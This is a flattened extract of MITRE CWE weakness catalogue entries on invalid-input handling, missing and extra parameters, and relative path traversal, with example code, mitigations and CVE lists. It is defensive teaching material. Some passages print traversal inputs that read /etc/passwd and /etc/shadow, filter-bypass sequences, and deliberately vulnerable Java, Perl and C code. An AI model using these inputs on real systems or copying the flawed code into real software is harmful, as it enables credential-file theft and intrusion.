Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Functional_Areas, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Name, Relationships, Time_of_Introduction, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Name, Related_Attack_Patterns, Relationships - - Sensitive Information Uncleared Before Use - Sensitive Information Uncleared Before Release - Sensitive Information Uncleared in Resource Before Release for Reuse - - - - The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification. - - - - - - - Implementation - - - Architecture and Design - - - - - Integrity - Availability - Unexpected State - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - If an input is syntactically invalid, then processing the input could place the system in an unexpected state that could lead to a crash, consume available system resources or other unintended behaviors. - - - - - This Android application has registered to handle a URL when sent an intent: - - - - ... - IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - ... - - public class UrlHandlerReceiver extends BroadcastReceiver { - @Overridepublic void onReceive(Context context, Intent intent) { - if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); - - ... - } - } - } - - The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. - - - - - Structure and Validity Problems - - - A7 - Improper Error Handling - CWE More Specific - - - - This entry needs more investigation. Public vulnerability research generally focuses on the manipulations that generate invalid structure, instead of the weaknesses that are exploited by those manipulations. For example, a common attack involves making a request that omits a required field, which can trigger a crash in some cases. The crash could be due to a named chain such as CWE-690 (Unchecked Return Value to NULL Pointer Dereference), but public reports rarely cover this aspect of a vulnerability. - The validity of input could be roughly classified along "syntactic", "semantic", and "lexical" dimensions. If the specification requires that an input value should be delimited with the "[" and "]" square brackets, then any input that does not follow this specification would be syntactically invalid. If the input between the brackets is expected to be a number, but the letters "aaa" are provided, then the input is syntactically invalid. If the input is a number and enclosed in brackets, but the number is outside of the allowable range, then it is semantically invalid. The inter-relationships between these properties - and their associated weaknesses- need further exploration. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Name, Relationships, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Maintenance_Notes, Theoretical_Notes - - Structure and Validity Problems - Failure to Handle Syntactically Invalid Structure - - - - The software does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined. - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Description, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Value Problems - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - - - - - - - - - - - Implementation - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. - - - Integrity - Modify Files or Directories - The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. - - - Confidentiality - Read Files or Directories - The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. - - - Availability - DoS: Crash, Exit, or Restart - The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: - - - realpath() in C - getCanonicalPath() in Java - GetFullPath() in ASP.NET - realpath() or abs_path() in Perl - realpath() in PHP - - - - - - - - The following URLs are vulnerable to this attack: - - http://example.com.br/get-files.jsp?file=report.pdfhttp://example.com.br/get-page.php?home=aaa.htmlhttp://example.com.br/some-page.asp?page=index.html - - A simple way to execute this attack is like this: - - http://example.com.br/get-files?file=../../../../somedir/somefilehttp://example.com.br/../../../../etc/shadowhttp://example.com.br/get-files?file=../../../../etc/passwd - - - - The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. - - my $dataPath = "/users/cwe/profiles";my $username = param("user");my $profilePath = $dataPath . "/" . $username; - open(my $fh, "<$profilePath") || ExitError("profile read error: $profilePath");print "<ul>\n";while (<$fh>) {print "<li>$_</li>\n";}print "</ul>\n"; - - While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: - - ../../../etc/passwd - - The program would generate a profile pathname like this: - - /users/cwe/profiles/../../../etc/passwd - - When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: - - /etc/passwd - - As a result, the attacker could read the entire text of the password file. - Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. - - - The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. - - <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> - Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> - </form> - - When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. - - public class FileUploadServlet extends HttpServlet { - - ... - protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); - // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); - String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value - // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { - - // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... - // output the file to the local upload directorytry { - BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); - - - } catch (IOException ex) {...}// output successful upload response HTML page - }// output unsuccessful upload response HTML pageelse{...} - }... - - } - - This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. - Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. - - - - - CVE-2002-0298 - Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several "/../" sequences, or several "../" in a URI. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298 - - - CVE-2002-0661 - "\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661 - - - CVE-2002-0946 - Arbitrary files may be read files via ..\ (dot dot) sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946 - - - CVE-2002-1042 - Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via "..\" sequences in queries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042 - - - CVE-2002-1209 - Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via "..\" sequences in a GET request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209 - - - CVE-2002-1178 - Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via "..\" sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178 - - - CVE-2002-1987 - Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987 - - - CVE-2005-2142 - Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a "\.." sequence in an LS command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142 - - - CVE-2002-0160 - The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a "..\.." sequence in the URL to port 2002. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160 - - - CVE-2001-0467 - "\..." in web server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467 - - - CVE-2001-0963 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963 - - - CVE-2001-1193 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193 - - - CVE-2001-1131 - "..." in cd command in FTP server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131 - - - CVE-2001-0480 - read of arbitrary files and directories using GET or CD with "..." in Windows-based FTP server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480 - - - CVE-2002-0288 - read files using "." and Unicode-encoded "/" or "\" characters in the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288 - - - CVE-2003-0313 - Directory listing of web server using "..." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313 - - - CVE-2005-1658 - Triple dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658 - - - CVE-2000-0240 - read files via "/........../" in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240 - - - CVE-2000-0773 - read files via "...." in web server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773 - - - CVE-1999-1082 - read files via "......" in web server (doubled triple dot?) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082 - - - CVE-2004-2121 - read files via "......" in web server (doubled triple dot?) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121 - - - CVE-2001-0491 - multiple attacks using "..", "...", and "...." in different commands - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491 - - - CVE-2001-0615 - "..." or "...." in chat server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615 - - - CVE-2005-2169 - chain: ".../...//" bypasses protection mechanism using regexp's that remove "../" resulting in collapse into an unsafe value "../" (CWE-182) and resultant path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169 - - - CVE-2005-0202 - ".../....///" bypasses regexp's that remove "./" and "../" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202 - - - CVE-2004-1670 - Mail server allows remote attackers to create arbitrary directories via a ".." or rename arbitrary files via a "....//" in user supplied parameters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670 - - - - - Relative Path Traversal - - - SFP16 - Path Traversal - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - This Android application has registered to handle a URL when sent an intent: - - - - ... - IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - ... - - public class UrlHandlerReceiver extends BroadcastReceiver { - @Overridepublic void onReceive(Context context, Intent intent) { - if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); - - ... - } - } - } - - The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. - - - - - CVE-2002-0422 - Blank Host header triggers resultant infoleak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0422 - - - CVE-2000-1006 - Blank "charset" attribute in MIME header triggers crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1006 - - - CVE-2004-1504 - Blank parameter causes external error infoleak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1504 - - - CVE-2005-2053 - Blank parameter causes external error infoleak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2053 - - - - - Missing Value Error - - - ERR08-J - Do not catch NullPointerException or any of its ancestors - - - - Some "crash by port scan" bugs are probably due to this, but lack of diagnosis makes it difficult to be certain. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Missing Value Error - Failure to Handle Missing Value - - - - The software does not handle or incorrectly handles when more values are provided than expected. - - - - - - - - - - Implementation - This typically occurs in situations when only one value is expected. - - - - - Integrity - Unexpected State - - - - - Extra Value Error - - - - This can overlap buffer overflows. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Description, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Extra Value Error - Failure to Handle Extra Value - - - - The software does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - In this example, an address parameter is read and trimmed of whitespace. - - String address = request.getParameter("address");address = address.trim();String updateString = "UPDATE shippingInfo SET address='?' WHERE email='cwe@example.com'";emailAddress = con.prepareStatement(updateString);emailAddress.setString(1, address); - - If the value of the address parameter is null (undefined), the servlet will throw a NullPointerException when the trim() is attempted. - - - - - CVE-2000-1003 - Client crash when server returns unknown driver type. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1003 - - - - - Undefined Value Error - - - ERR08-J - Do not catch NullPointerException or any of its ancestors - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Undefined Value Error - Failure to Handle Undefined Value - - - - The software does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined. - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - This Android application has registered to handle a URL when sent an intent: - - - - ... - IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - ... - - public class UrlHandlerReceiver extends BroadcastReceiver { - @Overridepublic void onReceive(Context context, Intent intent) { - if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); - - ... - } - } - } - - The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. - - - - - Parameter Problems - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Description, Name, Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Parameter Problems - - - - If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well. - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - There is the potential for arbitrary code execution with privileges of the vulnerable program if function parameter list is exhausted. - - - Availability - DoS: Crash, Exit, or Restart - Potentially a program could fail if it needs more arguments then are available. - - - - - Build and Compilation - This issue can be simply combated with the use of proper build process. - - - Implementation - Forward declare all functions. This is the recommended solution. Properly forward declaration of all used functions will result in a compiler error if too few arguments are sent to a function. - - - - - The following example demonstrates the weakness. - - foo_funct(one, two); - void foo_funct(int one, int two, int three) {printf("1) %d\n2) %d\n3) %d\n", one, two, three);} - - - void some_function(int foo, ...) {int a[3], i;va_list ap;va_start(ap, foo);for (i = 0; i < sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int);va_end(ap);} - int main(int argc, char *argv[]) {some_function(17, 42);} - - This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it. - - - - - CVE-2004-0276 - Server earlier allows remote attackers to cause a denial of service (crash) via an HTTP request with a sequence of "%" characters and a missing Host field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0276 - - - CVE-2002-1488 - Chat client allows remote malicious IRC servers to cause a denial of service (crash) via a PART message with (1) a missing channel or (2) a channel that the user is not in. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488 - - - CVE-2002-1169 - Proxy allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version numbers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1169 - - - CVE-2000-0521 - Web server allows disclosure of CGI source code via an HTTP request without the version number. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0521 - - - CVE-2001-0590 - Application server allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0590 - - - CVE-2003-0239 - Chat software allows remote attackers to cause a denial of service via malformed GIF89a headers that do not contain a GCT (Global Color Table) or an LCT (Local Color Table) after an Image Descriptor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0239 - - - CVE-2002-1023 - Server allows remote attackers to cause a denial of service (crash) via an HTTP GET request without a URI. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1023 - - - CVE-2002-1236 - CGI crashes when called without any arguments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1236 - - - CVE-2003-0422 - CGI crashes when called without any arguments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422 - - - CVE-2002-1531 - Crash in HTTP request without a Content-Length field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1531 - - - CVE-2002-1077 - Crash in HTTP request without a Content-Length field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1077 - - - CVE-2002-1358 - Empty elements/strings in protocol test suite affect many SSH2 servers/clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1358 - - - CVE-2003-0477 - FTP server crashes in PORT command without an argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0477 - - - CVE-2002-0107 - Resultant infoleak in web server via GET requests without HTTP/1.0 version string. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0107 - - - CVE-2002-0596 - GET request with empty parameter leads to error message infoleak (path disclosure). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0596 - - - - - Missing Parameter Error - - - Missing parameter - - - - This entry will be deprecated in a future version of CWE. The term "missing parameter" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry's observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-03-09 - Critical - added maintenance note: this entry will probably be deprecated - - - CWE Content Team - MITRE - 2009-03-10 - updated Maintenance_Notes, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Missing Parameter Error - - - - The software does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount. - - - - - - - - - Implementation - This typically occurs in situations when only one element is expected to be specified. - - - - - Integrity - Unexpected State - - - - - CVE-2003-1014 - MIE. multiple gateway/security products allow restriction bypass using multiple MIME fields with the same name, which are interpreted differently by clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1014 - - - - - Extra Parameter Error - - - - - - - This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Description, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Extra Parameter Error - Failure to Handle Extra Parameter - - - - The software does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - CVE-2002-1488 - Crash in IRC client via PART message from a channel the user is not in. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488 - - - CVE-2001-0650 - Router crash or bad route modification using BGP updates with invalid transitive attribute. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0650 